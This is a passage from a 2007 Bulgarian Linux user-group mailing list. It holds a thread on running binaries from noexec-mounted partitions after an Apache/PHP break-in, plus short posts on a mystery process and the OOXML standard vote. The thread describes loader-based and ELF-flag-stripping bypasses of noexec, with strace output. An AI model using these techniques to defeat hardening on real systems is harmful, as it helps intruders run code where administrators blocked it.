линкне и изпълни файла. Разбира се ако имаш някъде интерпретатор като perl, php, bash и файл написан на някой от тези скриптови езици, можеш да изпълниш /bin/interpretatora faila, но на партишън с noxec няма начин да изпълниш компилиран код (освен ако в ядрото няма някоя грешка) -- Georgi Chorbadzhiyski http://georgi.unixsol.org/ ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
Re: [Lug-bg] пробив през апаче и пхп :(
Summary. When doing this: /lib/ld-linux.so.2 /path/to/file/on/noexec/fs The linux-kernel disallows the mmap() of the executable textsegment: mmap2(0x8048000, 16384, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = -1 EPERM (Operation not permitted) But when trying it after doing nothing but removing the PF_X-flag from all segments: mmap2(0x8048000, 16384, PROT_READ, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0x8048000 (The program executes normally after this despite the missing PROT_EXEC-flag) The best way to deal with this would probably be to patch ld.so so it enforces the executable-bit by itself. Аз лично не съм си играл, чак толкова а и не ми се занимава... Може и да са го поправили, а може и да не са. Просто като чета това ме навежда на мисълта, че ядрото проверява само PROT_EXEC и пропуска изпълнението нататък... Съответно ако в libc няма проверка за това, програмата ще се стартира. Поздрави Мариян > Georgi Chorbadzhiyski <[EMAIL PROTECTED]> > Sent by: [EMAIL PROTECTED] > 12.07.2007 16:13 > Please respond to > Linux Users Group - Bulgaria > > > To > Linux Users Group - Bulgaria > cc > > Subject > Re: [Lug-bg] пробив през апаче и пхп :( > > Around 07/12/07 15:29, Marian Marinov scribbled: > > Има доста информация в интернет как можеш да стартираш бинарен файл > > върху дял > > > който е монтиран noexec. Основната идея е да се > > използва /lib/ld-linux.so.2 /path/to/binary/file > > Това отдавна не работи, от 2.5 нещо си нататък. При файла зареден от > noexec партишън ядрото не позволява паметта в която е зареден да бъде > маркирана като PROT_EXEC (ако си спомням правилно) ефективно това > не дава на динамичния линкер (ld-linux.so.2) да линкне и изпълни > файла. > > Разбира се ако имаш някъде интерпретатор като perl, php, bash и > файл написан на някой от тези скриптови езици, можеш да изпълниш > /bin/interpretatora faila, но на партишън с noxec няма начин да > изпълниш компилиран код (освен ако в ядрото няма някоя грешка) ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
Re: [Lug-bg] Странен процес в Дебиан
Здравейте, И аз го имам на моето ЗуЗЕ, след Х-а и преди КДЕ-то се е стартирал, така че нищо чудно да има нещо общо с тях. Поздрави, Косьо ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
[Lug-bg] Да се приеме ли MS OOXML ка то стандарт
Привет, не знам дали всички са разбрали, но в момента в БДС има комися, която трябва да изпрати становище до ИСО дали да се приеме MS OOXML формата за стандарт. До 2 спетември трява да се издаде становището. Това което можем да направим е да се свържем с разни организации, които да пратят на комисията мнение по въпроса. Йовко е писал по въпроса в блога си тук: http://yovko.net/?p=1185 -- Hristo Simeonov Hristov Leader of OpenOffice.org - Bulgarian GnuPG key 0xD0D895EB: 0282 D8D0 90D3 963F E57E B0A7 2670 88D9 D0D8 95EB ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
